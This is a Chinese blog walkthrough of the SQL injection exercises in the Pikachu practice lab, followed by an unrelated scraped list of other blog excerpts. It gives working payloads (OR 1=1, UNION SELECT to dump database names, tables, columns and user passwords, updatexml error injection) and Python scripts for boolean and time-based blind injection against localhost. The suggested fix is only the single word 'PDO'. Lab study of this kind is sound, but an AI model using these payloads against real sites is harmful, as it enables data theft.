_slience
_slience

pikachu-SQL注入漏洞源码分析及修复

概述

pikachu-SQL注入漏洞源码分析及修复_第1张图片
小声:pikachu最后一篇,严重偷懒hh

源码分析

数字型注入

首先测试一下id=1’,报错信息:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1,由此猜测是数字型注入,后台语句很有可能是"select ... from ... where id=某个数字"
于是抓包改为id=2 or 1=1,这样使得where的条件永远为真

pikachu-SQL注入漏洞源码分析及修复_第2张图片
得到全部人的信息
pikachu-SQL注入漏洞源码分析及修复_第3张图片
代码分析
后端直接拼接了id参数,导致漏洞。
pikachu-SQL注入漏洞源码分析及修复_第4张图片

字符型注入

输入1’测试一下,回显报错信息,猜测是字符型注入
在这里插入图片描述
构造1’ or '1'='1
pikachu-SQL注入漏洞源码分析及修复_第5张图片

输入-1' union select 1,database()#,暴库,进而可以暴表暴字段
pikachu-SQL注入漏洞源码分析及修复_第6张图片
代码分析
pikachu-SQL注入漏洞源码分析及修复_第7张图片

搜索型注入

测试一下输入数字1,回显出所有用户名中有1的,输入字母l,回显出用户名中所有有l的。于是猜测后台是like %%查询。
后台语句可能为select … from … where username like ‘%用户输入%’
于是输入%'#,查询出所有人的信息
pikachu-SQL注入漏洞源码分析及修复_第8张图片
输入l%' union select 1,2,database()#,暴库
pikachu-SQL注入漏洞源码分析及修复_第9张图片

输入l%' union select 1,2,table_name from information_schema.tables where table_schema=database()#,暴表

在这里插入图片描述

pikachu-SQL注入漏洞源码分析及修复_第10张图片
输入l%' union select 1,2,column_name from information_schema.columns where table_name='users' and table_schema=database()#,暴users表的列名

pikachu-SQL注入漏洞源码分析及修复_第11张图片

输入l%' union select 1,2,password from users#,暴password列的值
pikachu-SQL注入漏洞源码分析及修复_第12张图片
代码分析

pikachu-SQL注入漏洞源码分析及修复_第13张图片

xx型注入

测试以下输入lucy',报错回显You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''lucy'')' at line 1,可猜测后台语句
select .. from .. where ..=('用户输入')

输入-1') union select 1,database()#暴库
pikachu-SQL注入漏洞源码分析及修复_第14张图片
代码分析
pikachu-SQL注入漏洞源码分析及修复_第15张图片

“insert/update”注入

输入d ' or updatexml(1,concat(0x7e,concat(database(),0x7e)),0) or ',暴库

在这里插入图片描述
代码分析
pikachu-SQL注入漏洞源码分析及修复_第16张图片

“delete”注入

pikachu-SQL注入漏洞源码分析及修复_第17张图片代码分析
pikachu-SQL注入漏洞源码分析及修复_第18张图片

“http header”注入

把头信息回显出来,猜测可能是header注入
pikachu-SQL注入漏洞源码分析及修复_第19张图片
暴库
pikachu-SQL注入漏洞源码分析及修复_第20张图片
代码分析
pikachu-SQL注入漏洞源码分析及修复_第21张图片

盲注(base on boolean)

暴数据库名的长度

pikachu-SQL注入漏洞源码分析及修复_第22张图片
脚本:

url='http://localhost/pikachu/vul/sqli/sqli_blind_b.php'

for i in range(1,30):
    hurl=url+"?name=lucy' and length(database())>={0}--+&submit=查询".format(i)
    r=requests.get(hurl)
    m=r.text
    if 'email' in m:
        print(hurl)
        print(i)
    else:
        break

暴库暴表等脚本下次来补
代码分析
没有报错回显,但根据参数的boolean值有页面显示的区别,适合盲注

pikachu-SQL注入漏洞源码分析及修复_第23张图片

盲注(base on time)

暴数据库名的长度
pikachu-SQL注入漏洞源码分析及修复_第24张图片
py脚本

import requests,re
import time


#for i in range(1,30):
url='http://localhost/pikachu/vul/sqli/sqli_blind_t.php'

for i in range(1,30):
    startTime=time.time()
    hurl=url+"?name=lucy' and if(length(database())>={0},1,sleep(10))--+&submit=查询".format(i)
    r=requests.get(hurl)
    m=r.text
    if time.time()-startTime<8:
        print(hurl)
        print(i)
    else:
        break

暴库暴表等脚本下次来补
代码分析
报错不回显,参数变化显示页面也一样,适合时间盲注
pikachu-SQL注入漏洞源码分析及修复_第25张图片

宽字节注入

pikachu-SQL注入漏洞源码分析及修复_第26张图片

pikachu-SQL注入漏洞源码分析及修复_第27张图片

原理不赘述,转这里:https://www.jianshu.com/p/4fe931da9550
代码分析
虽然有转义,但是因为编码是gbk
pikachu-SQL注入漏洞源码分析及修复_第28张图片

修复

PDO

你可能感兴趣的:(web学习)

  • web学习笔记11-node.js基础 晴天.js web-学习笔记前端学习node.js
    一、ES6ECMAscript->ES是JS的标准规范ES6是JS的第六套标准规范1,块级作用域let声明的变量,会进入暂时性的死区,提升后暂时不允许访问,只有赋值以后才允许访问let声明的变量不允许重复声明块级作用域:大括号之间的语句块,例如if、else。块级作用域下,let和const声明的局部变量或者常量,不允许被块级作用域以外访问let和const即使声明在全局作用域下,也不是全局变量或
  • #Cookie、Session#JavaWeb学习笔记(2020/3/2) RinP
    一、会话技术客户端之间的通话:Cookie技术服务器端会话技术:Session技术目的是在一次会话中共享数据。1、Cookie技术使用Cookie的步骤:1.一个Servlet中、创建一个Cookie对象,存入键值对信息Cookiecookie=newCookie("msg","こんにちは");2.使用response对象的voidaddCookie(Cookievar1);方法添加Cookie到
  • Javaweb学习之Vue_Axios网络请求(七) 不要数手指啦 学习vue.js前端
    认识AxiosAxios是一个流行的JavaScript库,用于简化HTTP请求的发送和处理。它基于Promise的概念,使得HTTP请求和响应处理更加直观和易于管理。Axios可以在浏览器和Node.js环境中使用,主要用于从客户端向服务器发送请求并接收响应。主要特点基于Promise:Axios返回的请求和响应都是Promise对象,使得异步操作更加简单和直观,便于使用async/await语
  • JAVA Web学习(22)___第16章Hibernate技术 岁月静好浅笑安然
    第16章Hibernate技术16.1初识Hibernate16.1.1理解ORM原理16.1.2Hibernate简介Hibernate是一款免费开源的持久层框架,它对JDBC进行了轻量级的对象封装,将对象与数据库表建立了映射关系,使Java编程人员可以随心所欲地使用面向对象的编程思想操作数据库。Hibernate具有简单易用、灵活性强、扩展性强等特点,大大提高了程序的开发效率。使用传统的JDB
  • JAVA Web学习(20)___第14章Struts2基础 岁月静好浅笑安然
    第14章Struts2基础14.1Struts2概述14.1.1理解MVC原理14.1.2Struts2框架的产生14.1.3Struts2的结构体系14.2Struts2入门14.2.1Struts2的获取与放置开发struts项目必须添加的类库文件名称说明struts2-core-2.5.20.jarStruts2的核心类库xwork-core-2.1.6.jarXworkd的核心类库ognl
  • web学习笔记(四十二) shan33__ 笔记前端学习笔记javascript开发语言
    目录1.ECMAScript新特性-async和await1.1async函数1.2await函数1.3补充:2.ES6模块化2.1模块化的优点2.2ES6模块化语法2.3ES6模块暴露2.4ES6模块导入1.ECMAScript新特性-async和await1.1async函数async函数可以单数使用,但一般我们会将async函数和await函数结合使用,可以让异步代码像同步代码一样运行,也可
  • web学习笔记(三十六) shan33__ 笔记学习笔记html前端javascript
    目录1.解构1.1对象解构1.2字符串解构1.3函数解构1.4总结2.模板字符串3.实例方法:startsWith()和endsWith()4.箭头函数4.1箭头函数的格式4.2箭头函数可以省略的部分4.3箭头函数总结5.剩余参数rest参数1.解构1.1对象解构在解构对象时要求变量名和对象的属性名保持一致,顺序不需要一致,可以随便写,但变量名和属性名一定要保持一致否则会输出undefined。当
  • web学习笔记(三十四) shan33__ 笔记学习笔记javascript原型模式正则表达式
    目录1.面向对象的特征2.面向对象的继承方式3.正则表达式3.1如何创建正则表达式3.2边界符3.2[]方括号3.3正则表达式中相关的方法汇总3.4常用元字符含义3.5常用量词1.面向对象的特征封装性:就像是把东西放在一个密封的盒子里一样,只让外部使用者通过指定的接口来访问盒子里的东西,而不需要知道盒子里具体是怎么实现的。这样做可以保护内部数据,让代码更容易维护和重用。继承性:就像家族中的父子关系
  • web学习笔记(二十六) shan33__ 笔记学习笔记htmljavascriptecmascript
    目录1.JS执行队列1.1JS是单线程1.2WebWorker1.3同步和异步1.4JS执行机制2.location对象2.1什么是location对象2.2url包含的信息2.3location对象属性2.4location对象的方法3.navigator对象和history对象3.1navigator对象3.2history对象1.JS执行队列1.1JS是单线程JavaScript语言的一大特
  • JavaWeb学习(一)---MySQL数据库 肥大毛 Java学习数据库mysql学习
    文章目录MySQL查询中嵌套查询,称嵌套查询为子查询事务事务的四大特性数据库引擎存储过程变量函数触发器JDBCJDBC详解DriverManager驱动管理类Connection数据库连接对象Statementsql执行ResultSet:结果集对象PreparedStatement:预编译SQL语句并且执行,预防SQL注入问题在sql语句中?代表占位符数据库连接池练习:基于Druid连接池实现对
  • JavaWeb学习笔记(一)数据库概念、MySQL配置、SQL分类 Intention: 数据库sqlmysql
    JavaWeb学习笔记(一)JavaWeb介绍1.网页:展现数据2.数据库:存储和管理数据3.JavaWeb程序:逻辑处理数据库数据库相关概念数据库存储数据的仓库,数据是有组织的进行存储英文:DataBase,简称DB数据库管理系统管理数据库的大型软件英文:DataBaseManagementSystem,简称DBMSSQL英文:StructuredQueryLanguage,简称SQL,结构化查
  • JavaWeb学习(1)数据库相关概念,mysql数据库管理系统,SQL语句 Flyoungbuhu 学习数据库
    数据库相关概念数据库:存储数据的仓库,数据是有组织的进行存储英文:DataBase简称DB数据库管理系统:管理数据库的大型软件英文:DataBaseManagementSystem,简称DBMSSQL英文:StrycturedQueryLaguage,简称SQL,结构化查询语言操作关系型数据库的编程语言定义操作所有关系型数据库的统一标准安装Mysql数据库1.下载官网mysql数据库下载下载完成后
  • JavaWeb学习——事务管理&AOP&原理篇 Ustinian.488 JavaWeb学习数据库
    目录1.事务管理1.1事务回顾--spring事务管理1.2事务进阶--rollbackFor属性1.3事务进阶--propagation属性2.AOP(面向切面编程)2.1AOP基础--快速入门2.2AOP基础--核心概念2.3AOP进阶--通知类型2.4AOP进阶--通知顺序2.5AOP进阶--切入点表达式--execution2.6AOP进阶--切入点表达式[email protected]
  • SpringBootWeb学习笔记——12万字大合集 扶摇| javaj2eespringbootspringbootintellij-idea
    0.写在前面注:这套笔记是根据黑马程序员B站2023-3-21的视频学习的成果,其中省略了前端基础部分、Maven部分和数据库基础部分,详情可见目录。注注:目前文章内结尾处多幅图片加载不出来,因为图片还存在本地没被传上来,过段时间再改~所有的Spring项目都基于SpringFrameworkSpringFramework配置繁琐,入门难度大文章目录0.写在前面1.SpringBootWeb入门简
  • 【Go Web学习笔记】第十五章 Go与RPC ClimberCoding #GoWebgo语言golanggoweb
    前言:大家好,以下所有内容都是我学习韩茹老师的教程时所整理的笔记。部分内容有过删改,推荐大家去看原作者的文档进行学习,本文章仅作为个人的学习笔记,后续还会在此基础上不断修改。学习GoWeb时应该已经熟悉Go语言基本语法以及计算机网络的相关内容。学习链接:https://www.chaindesk.cn/witbook/17/253参考书籍:《GoWeb编程》谢孟军第十五章、RPC1、什么是RPCR
  • JavaWeb学习|i18n 半夜下雨 Java技术学习java
    学习材料声明所有知识点都来自互联网,进行总结和梳理,侵权必删。引用来源:尚硅谷最新版JavaWeb全套教程,javaweb零基础入门完整版i18n国际化(Internationalization)指的是同一个网站可以支持多种不同的语言,以方便不同国家,不同语种的用户访问。很有趣的命名。主要是实现多种网页语言的转换。需要的配置properties文件如何使用:@TestpublicvoidtestI
  • JavaWeb学习|JSON与AJAX 半夜下雨 Java技术学习java
    学习材料声明所有知识点都来自互联网,进行总结和梳理,侵权必删。引用来源:尚硅谷最新版JavaWeb全套教程,javaweb零基础入门完整版JSONJSON(JavaScriptObjectNotation)是一种轻量级的数据交换格式。易于人阅读和编写。同时也易于机器解析和生成。JSON采用完全独立于语言的文本格式,而且很多语言都提供了对json的支持(包括C,C++,C#,Java,JavaScr
  • JavaWeb学习|Filter与ThreadLocal 半夜下雨 Java技术学习学习
    学习材料声明所有知识点都来自互联网,进行总结和梳理,侵权必删。引用来源:尚硅谷最新版JavaWeb全套教程,javaweb零基础入门完整版Filter1、Filter过滤器它是JavaWeb的三大组件之一。三大组件分别是:Servlet程序、Listener监听器、Filter过滤器2、Filter过滤器它是JavaEE的规范。也就是接口3、Filter过滤器它的作用是:拦截请求,过滤响应。拦截请
  • (代码示例)css实现等高布局的三种方式 PHP9年架构师
    本篇文章给大家带来的内容是关于css实现等高布局的三种方式(代码示例),有一定的参考价值,有需要的朋友可以参考一下,希望对你有所帮助。本文讲的等高布局是在不手动设置元素高度的情况下,使用纯css实现各个元素高度都相当的效果。如图:首先小编在这里谢谢大家一直的支持,每天都会更新十个web前端基础内容,需要的可以关注我,另外也可以进我的web学习交流群1045267283,领取资料学习资料笔记,可以跟
  • RCE(命令执行)知识点总结最详细 22的卡卡 GITBOOK代码执行CTFWEB
    description:这里是CTF做题时常见的会遇见的RCE的漏洞知识点总结。如果你觉得写得好并且想看更多web知识的话可以去gitbook.22kaka.fun去看,上面是我写的一本关于web学习的一个gitbook,当然如果你能去我的github为我的这个项目点亮星星我会感激不尽https://github.com/kakaandhanhan/cybersecurity_knowledge_
  • web学习CSS3:文本样式 TDB
    1.标签设置字体(已废弃)CSS层叠样式2.文字样式属性2.1font-family1232.2font-size文字大小绝对单位相对单位2.2.1px(手机端一般不使用px)分辨率越低越大p{font-size:50px;}文字大小px,受显示器分辨率影响2.2.2larger和smaller.larger{font-size:larger;}.smaller{font-size:smaller
  • JavaWeb学习——ServletConfig类和ServletContext 类 柿子镭 Javaweb学习ServletConfigServletContextServlet
    目录一、ServletConfig类二、.ServletContext类一、ServletConfig类ServletConfig类从类名上来看,就是servlet程序的配置信息类。Servlet程序和ServletConfig对象都是由Tomcat负责创建的,我们负责使用。Servlet程序默认是第一次访问的时候创建,ServletConfig是每个Servlet程序创建时,就创建一个对应的Se
  • web学习笔记(十九) shan33__ 笔记学习笔记javascript前端开发语言
    目录1.作用域1.1作用域的概念1.2作用域的分类1.2.1全局作用域1.2.2局部作用域1.2.3块级作用域(ES6新增)2.变量作用域2.1全局变量2.2局部变量3.作用域链3.1作用域链的定义4.垃圾回收机制4.1定义4.2如何避免内存泄漏5.预解析1.作用域1.1作用域的概念我们平时声明的变量的名字,并不是在所有地方都有效,限定这个名字的可用范围,就是这个名字所在的作用域。作用域的使用可以
  • CTF web学习笔记 hiddenCarry CTF
    i春秋视频学习记录日常渗透测试(笔记)CTF学习记大佬的渗透测试记录web狗如何在CTF-web中的套路中实现反套路题目类型SQL注入SQL注入工具SQL解题思路SQL注入技巧XSSXSS注入工具XSS解题思路文件上传文件上传工具文件上传解题思路php特性PHP特性-工具php特性-解题思路php特性-伪协议后台登录类后台登录类-工具后台登录类解题思路加密解密类-考察知识点加解密类-工具加解密类-
  • [JavaWeb学习]Navicat连接云服务器mysql出现错误,“没有访问远程数据库的权限“ 开心星人 JavaWeb数据库mysql服务器
    报错信息:解决:宝塔面板,查看云服务器mysql的root密码mysql-uroot-p密码showdatabases;usemysqlselectuser,password,hostfromuser;所以只有host的主机才可以远程连接mysql数据库我们将我们的ip添加到该表中即可GRANTALLPRIVILEGESON*.*TO'root'@'你本机的IP地址'IDENTIFIEDBY'12
  • 1.30 尚硅谷javaweb学习 TJ8166 学习
    总结笔记:https://heavy_code_industry.gitee.io/code_heavy_industry/pro001-javaweb/lecture/
  • java web学习笔记(servlet生命周期) Peditable javaweb程序设计servletwebjavaservice
    Servlet生命周期可以分为三个阶段:1、初始化阶段,装载servlet容器:-Servlet容器启动的时候会自动装载某些Servlet;-在Serlvet容器启动后,客户端首次向Servlet发送请求的时候会装载Servlet;-Servlet类文件被更新后,也会重新装载Servlet。当Servlet被装载完后,Servlet容器会实例化一个Servlet对象,并通过Servlet对象调用i
  • JavaWeb学习——Session会话 柿子镭 Javawebsession
    目录一、Session会话二、创建Session和获取(id号,是否为新)三、Session域数据的存取四、Session生命周期控制1、设置Session的超时时间(以秒为单位)2、获取Session的超时时间3、让当前Session会话马上超时无效五、浏览器和Session之间关联的技术内幕一、Session会话1、Session就是一个接口(HttpSession)。2、Session就是会
  • java session变量_JavaWeb学习——session总结 袁mx javasession变量
    一、session简介sesion也就是会话,Session对象存储特定用户会话所需的属性及配置信息。这样,当用户在应用程序的Web页之间跳转时,存储在Session对象中的变量将不会丢失,而是在整个用户会话中一直存在下去。当用户请求来自应用程序的Web页时,如果该用户还没有会话,则Web服务器将自动创建一个Session对象。当会话过期或被放弃后,服务器将终止该会话。Session对象最常见的一
  • JavaWeb学习:session Eudemonia.Ewer 学习java-ee
    关于Session:图1session的话,是将数据保存在服务端的,是服务端的会话跟踪技术。关于session的原理,其实session是基于cookies实现的。假设服务端写了两个servlet,一个是servlet_a,一个是servlet_b。此时在servlet_a中创建一个session对象,并对session对象赋值;然后在servlet_b中可以通过getAttribute的方法获取
  • 辗转相处求最大公约数 沐刃青蛟 C++漏洞
    无言面对”江东父老“了,接触编程一年了,今天发现还不会辗转相除法求最大公约数。惭愧惭愧!   为此,总结一下以方便日后忘了好查找。   1.输入要比较的两个数a,b   忽略:2.比较大小(因为后面要的是大的数对小的数做%操作)   3.辗转相除(用循环不停的取余,如a%b,直至b=0)   4.最后的a为两数的最大公约数 &
  • F5负载均衡会话保持技术及原理技术白皮书 bijian1013 F5负载均衡
    一.什么是会话保持?        在大多数电子商务的应用系统或者需要进行用户身份认证的在线系统中,一个客户与服务器经常经过好几次的交互过程才能完成一笔交易或者是一个请求的完成。由于这几次交互过程是密切相关的,服务器在进行这些交互过程的某一个交互步骤时,往往需要了解上一次交互过程的处理结果,或者上几步的交互过程结果,服务器进行下
  • Object.equals方法:重载还是覆盖 Cwind javagenericsoverrideoverload
    本文译自StackOverflow上对此问题的讨论。 原问题链接   在阅读Joshua Bloch的《Effective Java(第二版)》第8条“覆盖equals时请遵守通用约定”时对如下论述有疑问: “不要将equals声明中的Object对象替换为其他的类型。程序员编写出下面这样的equals方法并不鲜见,这会使程序员花上数个小时都搞不清它为什么不能正常工作:” pu
  • 初始线程 15700786134
          暑假学习的第一课是讲线程,任务是是界面上的一条线运动起来。            既然是在界面上,那必定得先有一个界面,所以第一步就是,自己的类继承JAVA中的JFrame,在新建的类中写一个界面,代码如下: public class ShapeFr
  • Linux的tcpdump 被触发 tcpdump
    用简单的话来定义tcpdump,就是:dump the traffic on a network,根据使用者的定义对网络上的数据包进行截获的包分析工具。 tcpdump可以将网络中传送的数据包的“头”完全截获下来提供分析。它支 持针对网络层、协议、主机、网络或端口的过滤,并提供and、or、not等逻辑语句来帮助你去掉无用的信息。 实用命令实例 默认启动 tcpdump 普通情况下,直
  • 安卓程序listview优化后还是卡顿 肆无忌惮_ ListView
    最近用eclipse开发一个安卓app,listview使用baseadapter,里面有一个ImageView和两个TextView。使用了Holder内部类进行优化了还是很卡顿。后来发现是图片资源的问题。把一张分辨率高的图片放在了drawable-mdpi文件夹下,当我在每个item中显示,他都要进行缩放,导致很卡顿。解决办法是把这个高分辨率图片放到drawable-xxhdpi下。 &nb
  • 扩展easyUI tab控件,添加加载遮罩效果 知了ing jquery
    (function () { $.extend($.fn.tabs.methods, { //显示遮罩 loading: function (jq, msg) { return jq.each(function () { var panel = $(this).tabs(&
  • gradle上传jar到nexus 矮蛋蛋 gradle
    原文地址: https://docs.gradle.org/current/userguide/maven_plugin.html configurations {     deployerJars } dependencies {     deployerJars "org.apache.maven.wagon
  • 千万条数据外网导入数据库的解决方案。 alleni123 sqlmysql
    从某网上爬了数千万的数据,存在文本中。 然后要导入mysql数据库。 悲剧的是数据库和我存数据的服务器不在一个内网里面。。 ping了一下, 19ms的延迟。 于是下面的代码是没用的。 ps = con.prepareStatement(sql); ps.setString(1, info.getYear())............; ps.exec
  • JAVA IO InputStreamReader和OutputStreamReader 百合不是茶 JAVA.io操作 字符流
    这是第三篇关于java.io的文章了,从开始对io的不了解-->熟悉--->模糊,是这几天来对文件操作中最大的感受,本来自己认为的熟悉了的,刚刚在回想起前面学的好像又不是很清晰了,模糊对我现在或许是最好的鼓励 我会更加的去学 加油!: JAVA的API提供了另外一种数据保存途径,使用字符流来保存的,字符流只能保存字符形式的流   字节流和字符的难点:a,怎么将读到的数据
  • MO、MT解读 bijian1013 GSM
    MO= Mobile originate,上行,即用户上发给SP的信息。MT= Mobile Terminate,下行,即SP端下发给用户的信息; 上行:mo提交短信到短信中心下行:mt短信中心向特定的用户转发短信,你的短信是这样的,你所提交的短信,投递的地址是短信中心。短信中心收到你的短信后,存储转发,转发的时候就会根据你填写的接收方号码寻找路由,下发。在彩信领域是一样的道理。下行业务:由SP
  • 五个JavaScript基础问题 bijian1013 JavaScriptcallapplythisHoisting
    下面是五个关于前端相关的基础问题,但却很能体现JavaScript的基本功底。 问题1:Scope作用范围 考虑下面的代码:  (function() { var a = b = 5; })(); console.log(b); 什么会被打印在控制台上?  回答:         上面的代码会打印 5。 &nbs
  • 【Thrift二】Thrift Hello World bit1129 Hello world
    本篇,不考虑细节问题和为什么,先照葫芦画瓢写一个Thrift版本的Hello World,了解Thrift RPC服务开发的基本流程   1. 在Intellij中创建一个Maven模块,加入对Thrift的依赖,同时还要加上slf4j依赖,如果不加slf4j依赖,在后面启动Thrift Server时会报错 <dependency>
  • 【Avro一】Avro入门 bit1129 入门
    本文的目的主要是总结下基于Avro Schema代码生成,然后进行序列化和反序列化开发的基本流程。需要指出的是,Avro并不要求一定得根据Schema文件生成代码,这对于动态类型语言很有用。   1. 添加Maven依赖   <?xml version="1.0" encoding="UTF-8"?> <proj
  • 安装nginx+ngx_lua支持WAF防护功能 ronin47
    需要的软件:LuaJIT-2.0.0.tar.gz                   nginx-1.4.4.tar.gz          &nb
  • java-5.查找最小的K个元素-使用最大堆 bylijinnan java
    import java.util.Arrays; import java.util.Random; public class MinKElement { /** * 5.最小的K个元素 * I would like to use MaxHeap. * using QuickSort is also OK */ public static void
  • TCP的TIME-WAIT bylijinnan socket
    原文连接: http://vincent.bernat.im/en/blog/2014-tcp-time-wait-state-linux.html 以下为对原文的阅读笔记 说明: 主动关闭的一方称为local end,被动关闭的一方称为remote end 本地IP、本地端口、远端IP、远端端口这一“四元组”称为quadruplet,也称为socket 1、TIME_WA
  • jquery ajax 序列化表单 coder_xpf Jquery ajax 序列化
       checkbox 如果不设定值,默认选中值为on;设定值之后,选中则为设定的值   <input type="checkbox" name="favor" id="favor" checked="checked"/> $("#favor&quo
  • Apache集群乱码和最高并发控制 cuisuqiang apachetomcat并发集群乱码
    都知道如果使用Http访问,那么在Connector中增加URIEncoding即可,其实使用AJP时也一样,增加useBodyEncodingForURI和URIEncoding即可。 最大连接数也是一样的,增加maxThreads属性即可,如下,配置如下: <Connector maxThreads="300" port="8019" prot
  • websocket dalan_123 websocket
    一、低延迟的客户端-服务器 和 服务器-客户端的连接 很多时候所谓的http的请求、响应的模式,都是客户端加载一个网页,直到用户在进行下一次点击的时候,什么都不会发生。并且所有的http的通信都是客户端控制的,这时候就需要用户的互动或定期轮训的,以便从服务器端加载新的数据。   通常采用的技术比如推送和comet(使用http长连接、无需安装浏览器安装插件的两种方式:基于ajax的长
  • 菜鸟分析网络执法官 dcj3sjt126com 网络
      最近在论坛上看到很多贴子在讨论网络执法官的问题。菜鸟我正好知道这回事情.人道"人之患好为人师" 手里忍不住,就写点东西吧. 我也很忙.又没有MM,又没有MONEY....晕倒有点跑题. OK,闲话少说,切如正题. 要了解网络执法官的原理. 就要先了解局域网的通信的原理. 前面我们看到了.在以太网上传输的都是具有以太网头的数据包. 
  • Android相对布局属性全集 dcj3sjt126com android
    RelativeLayout布局android:layout_marginTop="25dip" //顶部距离android:gravity="left" //空间布局位置android:layout_marginLeft="15dip //距离左边距 // 相对于给定ID控件android:layout_above 将该控件的底部置于给定ID的
  • Tomcat内存设置详解 eksliang jvmtomcattomcat内存设置
    Java内存溢出详解   一、常见的Java内存溢出有以下三种:   1. java.lang.OutOfMemoryError: Java heap space ----JVM Heap(堆)溢出JVM在启动的时候会自动设置JVM Heap的值,其初始空间(即-Xms)是物理内存的1/64,最大空间(-Xmx)不可超过物理内存。 可以利用JVM提
  • Java6 JVM参数选项 greatwqs javaHotSpotjvmjvm参数JVM Options
    Java 6 JVM参数选项大全(中文版)   作者:Ken Wu Email: [email protected] 转载本文档请注明原文链接 http://kenwublog.com/docs/java6-jvm-options-chinese-edition.htm!   本文是基于最新的SUN官方文档Java SE 6 Hotspot VM Opt
  • weblogic创建JMC i5land weblogicjms
    进入 weblogic控制太 1.创建持久化存储 --Services--Persistant Stores--new--Create FileStores--name随便起--target默认--Directory写入在本机建立的文件夹的路径--ok 2.创建JMS服务器 --Services--Messaging--JMS Servers--new--name随便起--Pers
  • 基于 DHT 网络的磁力链接和BT种子的搜索引擎架构 justjavac DHT
    上周开发了一个磁力链接和 BT 种子的搜索引擎 {Magnet & Torrent},本文简单介绍一下主要的系统功能和用到的技术。 系统包括几个独立的部分: 使用 Python 的 Scrapy 框架开发的网络爬虫,用来爬取磁力链接和种子; 使用 PHP CI 框架开发的简易网站; 搜索引擎目前直接使用的 MySQL,将来可以考虑使
  • sql添加、删除表中的列 macroli sql
    添加没有默认值:alter table Test add BazaarType char(1) 有默认值的添加列:alter table Test add BazaarType char(1) default(0) 删除没有默认值的列:alter table Test drop COLUMN BazaarType 删除有默认值的列:先删除约束(默认值)alter table Test DRO
  • PHP中二维数组的排序方法 abc123456789cba 排序二维数组PHP
    <?php/*** @package     BugFree* @version     $Id: FunctionsMain.inc.php,v 1.32 2005/09/24 11:38:37 wwccss Exp $*** Sort an two-dimension array by some level
  • hive优化之------控制hive任务中的map数和reduce数 superlxw1234 hivehive优化
    一、    控制hive任务中的map数: 1.    通常情况下,作业会通过input的目录产生一个或者多个map任务。 主要的决定因素有: input的文件总个数,input的文件大小,集群设置的文件块大小(目前为128M, 可在hive中通过set dfs.block.size;命令查看到,该参数不能自定义修改);2. 
  • Spring Boot 1.2.4 发布 wiselyman spring boot
    Spring Boot 1.2.4已于6.4日发布,repo.spring.io and Maven Central可以下载(推荐使用maven或者gradle构建下载)。   这是一个维护版本,包含了一些修复small number of fixes,建议所有的用户升级。   Spring Boot 1.3的第一个里程碑版本将在几天后发布,包含许多
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他